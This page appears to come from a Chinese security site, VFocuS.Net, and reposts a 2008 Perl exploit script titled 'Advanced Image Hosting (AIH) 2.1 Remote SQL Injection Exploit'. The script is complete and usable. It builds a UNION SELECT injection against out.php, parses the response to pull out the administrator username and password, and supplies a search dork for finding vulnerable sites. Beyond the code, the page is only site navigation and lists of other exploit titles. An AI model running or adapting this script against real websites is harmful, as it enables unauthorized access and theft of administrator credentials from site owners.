首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Advanced Image Hosting (AIH) 2.1 Remote SQL Injection Exploit 来源：Stack-Terrorist 作者：Stack 发布时间：2008-05-13   #!/usr/bin/perl -w ########################################################## #                Advanced Image Host Script              # #    Powered by: AIH <=  v2.1 - Remote SQL Inj Exploit   # ########################################################## #  dork:Powered by: AIH v2.1 #  exploit aported password not crypted #  exploit tatjibe password mdecrypté :d #  mgharba :d:d:d:d ######################################## #[*] Founded by : Stack-Terrorist [v40] #[*] Contact: Ev!L #[*] Greetz : Houssamix & Djekmani & Jadi & iuoisn & All muslims HaCkeRs  :) ######################################## #----------------------------------------------------------------------------# ######################################## # * TITLE:          PerlSploit Class # * REQUIREMENTS:   PHP 4 / PHP 5 # * VERSION:        v.1 # * LICENSE:        GNU General Public License # * ORIGINAL URL:   http://www.v4-Team/v4.txt # * FILENAME:       PerlSploitClass.pl # * # * CONTACT:        dj-moad@hotmail.fr (french / english / arabic / moroco Darija :d ) # * GREETZ:         Houssamix & Djekmani # * THNX : AllaH ######################################## system("color a"); print "\t\t############################################################\n\n"; print "\t\t#                        Viva Islam                        #\n\n"; print "\t\t#                 Advanced Image Host Script               #\n\n"; print "\t\t#     Powered by: AIH <=  v2.1 - Remote SQL Inj Exploit    #\n\n"; print "\t\t#                 by Stack-Terrorist [v40]                 #\n\n"; print "\t\t############################################################\n\n"; ######################################## #----------------------------------------------------------------------------# ######################################## use LWP::UserAgent; die "Example: perl $0 http://victim.com/\n" unless @ARGV; system("color f"); ######################################## #----------------------------------------------------------------------------# ######################################## #the username $user="admin"; #the pasword $pass="pass"; #the tables $tab="setting"; ######################################## #----------------------------------------------------------------------------# ######################################## $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); ######################################## #----------------------------------------------------------------------------# ######################################## $host = $ARGV[0] . "/out.php?t=-1'/**/union/**/select/**/2,2,2,2,2,2,concat(CHAR(60,117,115,101,114,62),".$user.",CHAR(60,98,115,62,60,98,107,62),CHAR(60,112,97,115,115,62),".$pass.",CHAR(60,98,107,62,60,98,115,62)),2,2,2,2,2,2+from+".$tab."/*"; ######################################## #----------------------------------------------------------------------------# ######################################## $res = $b->request(HTTP::Request->new(GET=>$host)); $answer = $res->content; ######################################## #----------------------------------------------------------------------------# ######################################## if ($answer =~ /<user>(.*?)<bs><bk>/){         print "\nBrought to you by v4-team.com...\n";         print "\n[+] Admin User : $1"; } ######################################## #----------------------------------------------------------------------------# ######################################## if ($answer =~ /<pass>(.*?)<bk><bs>/){print "\n[+] Admin password : $1\n\n"; print "\t\t#   Exploit has ben aported user and password    #\n\n";} ######################################## #----------------------------------------------------------------------------# ######################################## else{print "\n[-] Exploit Failed...\n";} ######################################## #----------------------------------------------------------------------------# ######################################## #----------------------------------------------------------------------------# #              exploit exploited by Stack-Terrorist                              # #----------------------------------------------------------------------------# ######################################## #----------------------------------------------------------------------------# ########################################   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·CMS Made Simple <= 1.2.4 (File ·EQDKP 1.3.2f (user_id) Authent ·Battle.net Clan Script <= 1.5. ·IDAutomation Bar Code ActiveX ·Vortex CMS (index.php pageid) ·La-Nai CMS <= 1.2.16 (fckedito ·QuickUpCMS Multiple Remote SQL ·MS Internet Explorer (Print Ta ·Joomla Component xsstream-dm 0 ·Debian OpenSSL Predictable PRN ·rdesktop 1.5.0 process_redirec ·Symantec Altiris Client Servic   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved